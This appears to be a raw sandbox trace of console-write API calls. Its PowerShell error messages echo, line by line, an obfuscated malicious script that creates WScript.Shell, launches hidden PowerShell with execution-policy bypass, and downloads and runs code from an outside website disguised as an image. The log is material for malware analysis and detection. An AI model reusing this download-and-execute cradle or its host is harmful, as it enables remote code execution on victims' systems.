WriteConsoleW
|
buffer:
The term 'on' is not recognized as the name of a cmdlet, function, script file,
console_handle:
0x00000023
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
or operable program. Check the spelling of the name, or if a path was included
console_handle:
0x0000002f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
, verify that the path is correct and try again.
console_handle:
0x0000003b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\information.txt.ps1:1 char:3
console_handle:
0x00000047
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ on <<<< error resume next
console_handle:
0x00000053
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : ObjectNotFound: (on:String) [], CommandNotFoundE
console_handle:
0x0000005f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
xception
console_handle:
0x0000006b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : CommandNotFoundException
console_handle:
0x00000077
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
The term 'on' is not recognized as the name of a cmdlet, function, script file,
console_handle:
0x00000097
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
or operable program. Check the spelling of the name, or if a path was included
console_handle:
0x000000a3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
, verify that the path is correct and try again.
console_handle:
0x000000af
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\information.txt.ps1:2 char:3
console_handle:
0x000000bb
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ on <<<< error resume next
console_handle:
0x000000c7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : ObjectNotFound: (on:String) [], CommandNotFoundE
console_handle:
0x000000d3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
xception
console_handle:
0x000000df
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : CommandNotFoundException
console_handle:
0x000000eb
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
The term 'uAJ' is not recognized as the name of a cmdlet, function, script file
console_handle:
0x0000010b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
, or operable program. Check the spelling of the name, or if a path was include
console_handle:
0x00000117
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
d, verify that the path is correct and try again.
console_handle:
0x00000123
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\information.txt.ps1:3 char:4
console_handle:
0x0000012f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ uAJ <<<< = replace("W375cript.375hEll","375","s")
console_handle:
0x0000013b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : ObjectNotFound: (uAJ:String) [], CommandNotFound
console_handle:
0x00000147
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Exception
console_handle:
0x00000153
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : CommandNotFoundException
console_handle:
0x0000015f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
The term 'uAJ' is not recognized as the name of a cmdlet, function, script file
console_handle:
0x00000023
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
, or operable program. Check the spelling of the name, or if a path was include
console_handle:
0x0000000f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
d, verify that the path is correct and try again.
console_handle:
0x00000027
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\information.txt.ps1:4 char:27
console_handle:
0x0000003f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ Set ZEZ = CreateObject(uAJ <<<< )
console_handle:
0x0000004b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : ObjectNotFound: (uAJ:String) [], CommandNotFound
console_handle:
0x00000057
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Exception
console_handle:
0x00000063
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : CommandNotFoundException
console_handle:
0x0000006f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
The term 'qLv' is not recognized as the name of a cmdlet, function, script file
console_handle:
0x00000097
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
, or operable program. Check the spelling of the name, or if a path was include
console_handle:
0x000000a3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
d, verify that the path is correct and try again.
console_handle:
0x000000af
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\information.txt.ps1:5 char:4
console_handle:
0x000000bb
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ qLv <<<< = "Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN"
console_handle:
0x000000c7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : ObjectNotFound: (qLv:String) [], CommandNotFound
console_handle:
0x000000d3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Exception
console_handle:
0x000000df
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : CommandNotFoundException
console_handle:
0x000000eb
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
The term 'ZEZZEZ364' is not recognized as the name of a cmdlet, function, scrip
console_handle:
0x0000010b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
t file, or operable program. Check the spelling of the name, or if a path was i
console_handle:
0x00000117
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ncluded, verify that the path is correct and try again.
console_handle:
0x00000123
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\information.txt.ps1:6 char:10
console_handle:
0x0000012f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ ZEZZEZ364 <<<< = " -eXeC BYPASS -NONI $FRJX36='IeX(NeW-OBJeCT NeT.W';$GSX='e
console_handle:
0x0000013b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
BCLIeNT).DOWNLO';Sleep 1;[BYTe[]];Sleep 3;$SCV='UGYDS(''https://theemirateshill
console_handle:
0x00000147
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
s.com//wp-includes/js/moos2.png'')'.RePLACe('UGYDS','ADSTRING');Sleep 1;IeX($FR
console_handle:
0x00000153
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
JX36+$GSX+$SCV)"
console_handle:
0x0000015f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : ObjectNotFound: (ZEZZEZ364:String) [], CommandNo
console_handle:
0x0000016b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
tFoundException
console_handle:
0x00000177
|
1
|
1 |
0
|